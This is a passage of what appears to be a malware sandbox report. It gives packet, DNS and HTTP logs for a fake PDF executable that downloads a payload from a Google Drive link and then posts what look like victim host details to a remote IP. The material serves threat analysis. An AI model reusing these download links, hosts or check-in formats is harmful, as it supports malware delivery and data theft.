Nov 30, 2022 00:31:36.194185972 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.194263935 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.194359064 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.194547892 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.195283890 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.195485115 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.195549965 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.195982933 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.196171045 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.196225882 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.196439028 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.198167086 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.198345900 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.198385954 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.198849916 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.201076031 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.201406956 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.203979969 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.204233885 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.204291105 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.204576015 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.204622984 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.204778910 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.204869986 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.204936028 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.204979897 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.205188990 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.205256939 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.205456018 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.205496073 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.205528975 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.205698967 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.205699921 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.206115007 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.206336021 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.206392050 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.206670046 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.206896067 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.207021952 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.207073927 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.207273006 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.207426071 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.207664013 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.207719088 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.207990885 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.208270073 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.208506107 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.208565950 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.208812952 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.209053993 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.209290028 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.209343910 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.209602118 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.209661961 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.209861040 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.209897995 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.210105896 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.210390091 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.210585117 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.210622072 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.210923910 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.210963011 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.211199999 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.211230993 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.211417913 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.211746931 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.211963892 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.212017059 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.212210894 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.212599039 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.212840080 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.212894917 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.213157892 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.213177919 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.213217974 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.213407040 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.213645935 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.213856936 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.214068890 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.214111090 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.214304924 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.214612007 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.214812994 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.214857101 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.215100050 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.215135098 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.215338945 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.215442896 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.215483904 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.215501070 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.215676069 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.215718985 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.215864897 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.215892076 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.216243982 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.216270924 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.216516018 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.216604948 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.216650009 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.216890097 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.216890097 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.216916084 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.216944933 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.217200041 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.217251062 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.217489958 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.217519045 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.217708111 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.217742920 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.217941046 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.217978954 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.218020916 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.218152046 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.218403101 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.218441010 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.218830109 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.218856096 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.219201088 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.219232082 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.219470978 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.219590902 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.219630957 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.219743967 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.219850063 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.219897032 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.219964981 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.220211029 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.220220089 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.220257998 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.220407963 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.220407963 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.220494986 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.220705032 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.220746040 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.220937967 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.220964909 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.221157074 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.221198082 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.221234083 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.221376896 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.221378088 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.221431017 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.221668005 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.221705914 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.221975088 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.222007036 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.222043037 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.222368956 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.222398043 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.222559929 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.222567081 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.222598076 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.222784996 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.222785950 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.222824097 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.223032951 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.223064899 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.223227024 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.223251104 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.223398924 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.223432064 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.223516941 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:36.223571062 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.223787069 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.228694916 CET	49837	443	192.168.11.20	142.250.185.161
Nov 30, 2022 00:31:36.228755951 CET	443	49837	142.250.185.161	192.168.11.20
Nov 30, 2022 00:31:37.308829069 CET	49838	80	192.168.11.20	157.245.36.27
Nov 30, 2022 00:31:37.332094908 CET	80	49838	157.245.36.27	192.168.11.20
Nov 30, 2022 00:31:37.332345009 CET	49838	80	192.168.11.20	157.245.36.27
Nov 30, 2022 00:31:37.333969116 CET	49838	80	192.168.11.20	157.245.36.27
Nov 30, 2022 00:31:37.356173992 CET	80	49838	157.245.36.27	192.168.11.20
Nov 30, 2022 00:31:37.356368065 CET	49838	80	192.168.11.20	157.245.36.27
Nov 30, 2022 00:31:37.378530979 CET	80	49838	157.245.36.27	192.168.11.20
Nov 30, 2022 00:31:38.067742109 CET	80	49838	157.245.36.27	192.168.11.20
Nov 30, 2022 00:31:38.067996979 CET	49838	80	192.168.11.20	157.245.36.27
Nov 30, 2022 00:31:38.075294018 CET	80	49838	157.245.36.27	192.168.11.20
Nov 30, 2022 00:31:38.075453043 CET	80	49838	157.245.36.27	192.168.11.20
Nov 30, 2022 00:31:38.075481892 CET	80	49838	157.245.36.27	192.168.11.20
Nov 30, 2022 00:31:38.075496912 CET	80	49838	157.245.36.27	192.168.11.20
Nov 30, 2022 00:31:38.075512886 CET	80	49838	157.245.36.27	192.168.11.20
Nov 30, 2022 00:31:38.075527906 CET	80	49838	157.245.36.27	192.168.11.20
Nov 30, 2022 00:31:38.075540066 CET	80	49838	157.245.36.27	192.168.11.20
Nov 30, 2022 00:31:38.075556040 CET	80	49838	157.245.36.27	192.168.11.20
Nov 30, 2022 00:31:38.075562000 CET	49838	80	192.168.11.20	157.245.36.27
Nov 30, 2022 00:31:38.075572968 CET	80	49838	157.245.36.27	192.168.11.20
Nov 30, 2022 00:31:38.075704098 CET	49838	80	192.168.11.20	157.245.36.27
Nov 30, 2022 00:31:38.075875998 CET	49838	80	192.168.11.20	157.245.36.27
Nov 30, 2022 00:31:38.075875998 CET	49838	80	192.168.11.20	157.245.36.27
Nov 30, 2022 00:31:38.075897932 CET	49838	80	192.168.11.20	157.245.36.27
Nov 30, 2022 00:31:38.090306044 CET	80	49838	157.245.36.27	192.168.11.20
Nov 30, 2022 00:31:38.090418100 CET	80	49838	157.245.36.27	192.168.11.20
Nov 30, 2022 00:31:38.090445995 CET	80	49838	157.245.36.27	192.168.11.20
Nov 30, 2022 00:31:38.090475082 CET	49838	80	192.168.11.20	157.245.36.27
Nov 30, 2022 00:31:38.090578079 CET	49838	80	192.168.11.20	157.245.36.27

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 30, 2022 00:31:35.102749109 CET	49240	53	192.168.11.20	1.1.1.1
Nov 30, 2022 00:31:35.111932993 CET	53	49240	1.1.1.1	192.168.11.20
Nov 30, 2022 00:31:35.755490065 CET	53919	53	192.168.11.20	1.1.1.1
Nov 30, 2022 00:31:35.793382883 CET	53	53919	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 30, 2022 00:31:35.102749109 CET	192.168.11.20	1.1.1.1	0x6df6	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:31:35.755490065 CET	192.168.11.20	1.1.1.1	0x3147	Standard query (0)	doc-0g-8k-docs.googleusercontent.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 30, 2022 00:31:35.111932993 CET	1.1.1.1	192.168.11.20	0x6df6	No error (0)	drive.google.com		142.250.185.238	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:31:35.793382883 CET	1.1.1.1	192.168.11.20	0x3147	No error (0)	doc-0g-8k-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2022 00:31:35.793382883 CET	1.1.1.1	192.168.11.20	0x3147	No error (0)	googlehosted.l.googleusercontent.com		142.250.185.161	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

doc-0g-8k-docs.googleusercontent.com

157.245.36.27

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49836	142.250.185.238	443	C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49837	142.250.185.161	443	C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.11.20	49838	157.245.36.27	80	C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 30, 2022 00:31:37.333969116 CET	232	OUT	POST /~dokterpol/?page=2874 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 157.245.36.27 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A663AB80 Content-Length: 178 Connection: close
Nov 30, 2022 00:31:37.356368065 CET	233	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: 'ckav.ruArthur123716W1064_038k028278665D4ACB73EF64D459AoczvE
Nov 30, 2022 00:31:38.067742109 CET	233	IN	HTTP/1.1 200 OK Date: Tue, 29 Nov 2022 23:31:37 GMT Server: Apache Link: <https://dokterpol.nz/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Nov 30, 2022 00:31:38.075294018 CET	235	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 69 6e 6b 20 55 6e 69 63 6f 72 6e 20 26 23 38 32 31 Data Ascii: <meta name='robots' content='max-image-preview:large' /><title>Pink Unicorn – Page 2874</title><link rel='dns-prefetch' href='//dokterpol.nz' /><link rel="alternate" type="application/rss+xml" title="Pink Unicorn » Feed" href="h
Nov 30, 2022 00:31:38.075453043 CET	236	IN	Data Raw: 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 74 2e 73 75 70 70 6f 72 74 73 5b 6f 5b 72 5d 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 70 26 26 70 2e 66 69 6c 6c 54 65 78 74 29 73 77 69 74 63 68 28 70 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 Data Ascii: .length;r++)t.supports[o[r]]=function(e){if(p&&p.fillText)switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,82
Nov 30, 2022 00:31:38.075481892 CET	237	IN	Data Raw: 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 3e 0a 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 0a 69 6d 67 2e 65 6d 6f 6a 69 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 62 6f 72 64 65 Data Ascii: ;</script><style>img.wp-smiley,img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0.07em !important;vertical-align: -0.1em !importa
Nov 30, 2022 00:31:38.075496912 CET	238	IN	Data Raw: 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 64 6f 6b 74 65 72 70 6f 6c 2e 6e 7a 2f 77 70 2d 69 6e 63 Data Ascii: ink rel='stylesheet' id='wp-block-navigation-css' href='http://dokterpol.nz/wp-includes/blocks/navigation/style.min.css?ver=6.1.1' media='all' /><style id='wp-block-navigation-inline-css'>.wp-block-navigation{font-size: var(--wp--preset--fon
Nov 30, 2022 00:31:38.075512886 CET	240	IN	Data Raw: 6b 2d 70 6f 73 74 2d 66 65 61 74 75 72 65 64 2d 69 6d 61 67 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 66 65 61 74 75 72 65 64 2d 69 6d 61 67 65 5f 5f 6f 76 65 72 6c 61 79 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 7b 70 6f Data Ascii: k-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim{position:absolute;inset:0;background-color:#000}.wp-block-post-featured-image{position:relative}.wp-block-post-featured-image .wp-block-post-featured-image__overla
Nov 30, 2022 00:31:38.075527906 CET	241	IN	Data Raw: 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2d 39 30 7b 6f 70 61 63 69 74 79 3a 2e 39 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 66 65 61 74 75 72 65 64 2d 69 6d 61 67 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 66 65 61 74 75 72 65 Data Ascii: -background-dim-90{opacity:.9}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-100{opacity:1}</style><style id='wp-block-post-title-inline-css'>.wp-block-post-title{word-break:break-word;box-sizing:bor
Nov 30, 2022 00:31:38.075540066 CET	241	IN	Data Raw: 62 6c 6f 63 6b 2d 70 6f 73 74 2d 65 78 63 65 72 70 74 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 65 78 63 65 72 70 74 5f 5f 6d 6f 72 65 2d 6c 69 6e 6b 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 Data Ascii: block-post-excerpt-inline-css'>.wp-block-post-excerpt__more-link{display:inline-block}.wp-block-post-excerpt{font-size: var(--wp--preset--font-size--medium);}</style><style id='wp-block-post-date-inline-css'>.wp-block-post-date{box-sizing
Nov 30, 2022 00:31:38.075556040 CET	243	IN	Data Raw: 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 73 6d 61 6c 6c 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 7d 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 64 61 74 65 20 61 3a 77 68 Data Ascii: e: var(--wp--preset--font-size--small);font-weight: 400;}.wp-block-post-date a:where(:not(.wp-element-button)){text-decoration: none;}.wp-block-post-date a:where(:not(.wp-element-button)):hover{text-decoration: underline;}</style><style id
Nov 30, 2022 00:31:38.075572968 CET	244	IN	Data Raw: 79 2d 70 61 67 69 6e 61 74 69 6f 6e 3e 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 65 72 79 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 6e 65 78 74 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 65 72 79 2d 70 61 67 69 6e 61 74 69 6f 6e 3e 2e 77 70 2d 62 6c 6f 63 6b 2d Data Ascii: y-pagination>.wp-block-query-pagination-next,.wp-block-query-pagination>.wp-block-query-pagination-numbers,.wp-block-query-pagination>.wp-block-query-pagination-previous{margin-right:.5em;margin-bottom:.5em}.wp-block-query-pagination>.wp-block
Nov 30, 2022 00:31:38.090418100 CET	246	IN	Data Raw: 74 3a 20 34 30 30 3b 7d 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 65 72 79 2d 70 61 67 69 6e 61 74 69 6f 6e 20 61 3a 77 68 65 72 65 28 3a 6e 6f 74 28 2e 77 70 2d 65 6c 65 6d 65 6e 74 2d 62 75 74 74 6f 6e 29 29 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 Data Ascii: t: 400;}.wp-block-query-pagination a:where(:not(.wp-element-button)){text-decoration: none;}.wp-block-query-pagination a:where(:not(.wp-element-button)):hover{text-decoration: underline;}</style><style id='wp-block-query-inline-css'>.wp-b

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49836	142.250.185.238	443	C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-29 23:31:35 UTC	0	OUT	GET /uc?export=download&id=1ZppbncXCwboWfcBo0A5zlqzevMjFwzpW HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache
2022-11-29 23:31:35 UTC	0	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 29 Nov 2022 23:31:35 GMT Location: https://doc-0g-8k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/65eu063p0f9eoc2qkjfmonuuk5gkqmq4/1669764675000/03238822727237126472//1ZppbncXCwboWfcBo0A5zlqzevMjFwzpW?e=download&uuid=c4bc146b-22c6-4e17-89b8-c96a6eb96fab Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-G1RBgpndCPEMGZnWUVBN4w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version 